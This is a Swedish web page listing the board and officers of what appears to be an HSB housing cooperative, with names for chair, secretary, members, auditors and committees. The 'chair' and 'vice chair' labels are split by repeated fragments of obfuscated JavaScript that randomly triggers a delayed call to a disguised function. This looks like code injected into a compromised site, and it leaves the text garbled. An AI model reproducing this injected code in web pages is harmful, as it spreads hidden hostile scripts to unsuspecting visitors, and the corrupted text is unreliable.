Förtroendevalda

Styrelsens sammansättning.

Ordförandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>andeandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>: Daniel SörenssonDSC_7271

Vice ordförandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>andeandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>: Mikael Nordehammar

Sekreterare: Carina Nordström

Vice sekreterare: Linda Fransen

Ledamot : Jan Sörensson

Ledamot: Anders Persson

Ledamot: Anders Karlsson

HSB representant: Per Mattsson

 

Suppleant HSB: Ted Lindberg

Revisor: Christer Andersson

Revisorsuppleant: Andreas Feuk

 

Valberedning:DSC_7269

Marcus Sörensson, Kristian Lundin

Fritidskommitté:

Vakant

Vicevärd med ansvar för administration: Frans Palmqvist

Fastighetsskötaren: HSB Boservice